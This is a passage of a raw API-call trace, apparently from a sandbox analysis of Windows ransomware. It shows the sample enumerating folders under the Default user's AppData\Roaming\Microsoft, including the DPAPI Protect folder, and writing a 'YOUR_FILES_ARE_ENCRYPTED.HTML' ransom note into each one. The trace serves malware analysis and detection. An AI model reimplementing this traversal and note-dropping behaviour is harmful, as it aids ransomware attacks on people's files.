lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbca66880, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a01436b, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x58b, dwReserved0=0x0, dwReserved1=0x60, cFileName="Internet Explorer.lnk", cAlternateFileName="INTERN~1.LNK")) returned 1 [0171.105] wnsprintfW (in: pszDest=0x75ba010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk") returned 119 [0171.105] lstrcmpW (lpString1="Internet Explorer.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.105] PathFindExtensionW (pszPath="Internet Explorer.lnk") returned=".lnk" [0171.105] lstrlenW (lpString=".lnk") returned 4 [0171.105] PathFindExtensionW (pszPath="Internet Explorer.lnk") returned=".lnk" [0171.105] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbca66880, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd34e2948, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows Explorer.lnk", cAlternateFileName="WINDOW~2.LNK")) returned 1 [0171.106] wnsprintfW (in: pszDest=0x75ba010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk") returned 118 [0171.106] lstrcmpW (lpString1="Windows Explorer.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.106] PathFindExtensionW (pszPath="Windows Explorer.lnk") returned=".lnk" [0171.106] lstrlenW (lpString=".lnk") returned 4 [0171.106] PathFindExtensionW (pszPath="Windows Explorer.lnk") returned=".lnk" [0171.106] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbca66880, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8942d555, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x5eb, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows Media Player.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0171.106] wnsprintfW (in: pszDest=0x75ba010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk") returned 122 [0171.106] lstrcmpW (lpString1="Windows Media Player.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.106] PathFindExtensionW (pszPath="Windows Media Player.lnk") returned=".lnk" [0171.106] lstrlenW (lpString=".lnk") returned 4 [0171.106] PathFindExtensionW (pszPath="Windows Media Player.lnk") returned=".lnk" [0171.106] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbca66880, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8942d555, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x5eb, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows Media Player.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 0 [0171.106] FindClose (in: hFindFile=0x42f32c0 | out: hFindFile=0x42f32c0) returned 1 [0171.108] wnsprintfW (in: pszDest=0x75ba010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0171.108] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x590 [0171.111] WriteFile (in: hFile=0x590, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebcee4, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebcee4*=0x3c00, lpOverlapped=0x0) returned 1 [0171.114] CloseHandle (hObject=0x590) returned 1 [0171.119] GetProcessHeap () returned 0x270000 [0171.121] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75ba010 | out: hHeap=0x270000) returned 1 [0171.121] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8bbe64be, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="TaskBar", cAlternateFileName="")) returned 0 [0171.121] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0171.121] wnsprintfW (in: pszDest=0x75aa008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0171.121] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5dc [0171.125] WriteFile (in: hFile=0x5dc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0171.128] CloseHandle (hObject=0x5dc) returned 1 [0171.128] GetProcessHeap () returned 0x270000 [0171.129] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75aa008 | out: hHeap=0x270000) returned 1 [0171.130] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd371ddec, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd3743f4d, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x60, cFileName="Window Switcher.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0171.130] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk") returned 97 [0171.130] lstrcmpW (lpString1="Window Switcher.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.130] PathFindExtensionW (pszPath="Window Switcher.lnk") returned=".lnk" [0171.130] lstrlenW (lpString=".lnk") returned 4 [0171.130] PathFindExtensionW (pszPath="Window Switcher.lnk") returned=".lnk" [0171.130] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd371ddec, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd3743f4d, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x60, cFileName="Window Switcher.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 0 [0171.130] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0171.130] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0171.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0171.131] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0171.134] CloseHandle (hObject=0x58c) returned 1 [0171.134] GetProcessHeap () returned 0x270000 [0171.135] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7769010 | out: hHeap=0x270000) returned 1 [0171.135] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x896689f9, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 0 [0171.135] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0171.135] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 94 [0171.135] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5fc [0171.136] WriteFile (in: hFile=0x5fc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0171.138] CloseHandle (hObject=0x5fc) returned 1 [0171.138] GetProcessHeap () returned 0x270000 [0171.139] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7759008 | out: hHeap=0x270000) returned 1 [0171.139] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca40720, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82615b0a, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Protect", cAlternateFileName="")) returned 1 [0171.139] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect") returned 54 [0171.139] GetProcessHeap () returned 0x270000 [0171.139] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7759008 [0171.140] lstrcpyW (in: lpString1=0x7759008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect" [0171.140] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\*" [0171.140] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca40720, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82615b0a, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0171.140] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca40720, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82615b0a, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.140] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xbca40720, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca40720, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82615b0a, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x60, cFileName="CREDHIST", cAlternateFileName="")) returned 1 [0171.140] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned 63 [0171.140] lstrcmpW (lpString1="CREDHIST", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.140] PathFindExtensionW (pszPath="CREDHIST") returned="" [0171.140] lstrlenW (lpString="") returned 0 [0171.140] PathFindExtensionW (pszPath="CREDHIST") returned="" [0171.140] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca40720, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="S-1-5-21-892523515-1518344882-2423736544-500", cAlternateFileName="S-1-5-~1")) returned 1 [0171.140] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500") returned 99 [0171.141] GetProcessHeap () returned 0x270000 [0171.141] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7769010 [0171.141] lstrcpyW (in: lpString1=0x7769010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500" [0171.141] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500\\*" [0171.141] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca40720, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0171.147] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca40720, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.147] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xbca40720, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca40720, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8276c76d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x0, dwReserved1=0x60, cFileName="16d9487c-eb21-48f6-b767-53160cf7974d", cAlternateFileName="16D948~1")) returned 1 [0171.147] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500\\16d9487c-eb21-48f6-b767-53160cf7974d") returned 136 [0171.147] lstrcmpW (lpString1="16d9487c-eb21-48f6-b767-53160cf7974d", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.147] PathFindExtensionW (pszPath="16d9487c-eb21-48f6-b767-53160cf7974d") returned="" [0171.147] lstrlenW (lpString="") returned 0 [0171.147] PathFindExtensionW (pszPath="16d9487c-eb21-48f6-b767-53160cf7974d") returned="" [0171.147] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xbca40720, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca40720, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x60, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 1 [0171.147] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500\\Preferred") returned 109 [0171.147] lstrcmpW (lpString1="Preferred", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.147] PathFindExtensionW (pszPath="Preferred") returned="" [0171.147] lstrlenW (lpString="") returned 0 [0171.147] PathFindExtensionW (pszPath="Preferred") returned="" [0171.147] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xbca40720, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca40720, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x60, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 0 [0171.147] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0171.149] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 129 [0171.149] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-892523515-1518344882-2423736544-500\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0171.152] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0171.155] CloseHandle (hObject=0x58c) returned 1 [0171.155] GetProcessHeap () returned 0x270000 [0171.156] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7769010 | out: hHeap=0x270000) returned 1 [0171.156] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca40720, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="S-1-5-21-892523515-1518344882-2423736544-500", cAlternateFileName="S-1-5-~1")) returned 0 [0171.156] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0171.156] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 84 [0171.156] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5fc [0171.157] WriteFile (in: hFile=0x5fc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0171.159] CloseHandle (hObject=0x5fc) returned 1 [0171.159] GetProcessHeap () returned 0x270000 [0171.160] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7759008 | out: hHeap=0x270000) returned 1 [0171.161] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="SystemCertificates", cAlternateFileName="SYSTEM~1")) returned 1 [0171.161] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates") returned 65 [0171.161] GetProcessHeap () returned 0x270000 [0171.161] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7759008 [0171.161] lstrcpyW (in: lpString1=0x7759008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates" [0171.161] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*" [0171.161] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, 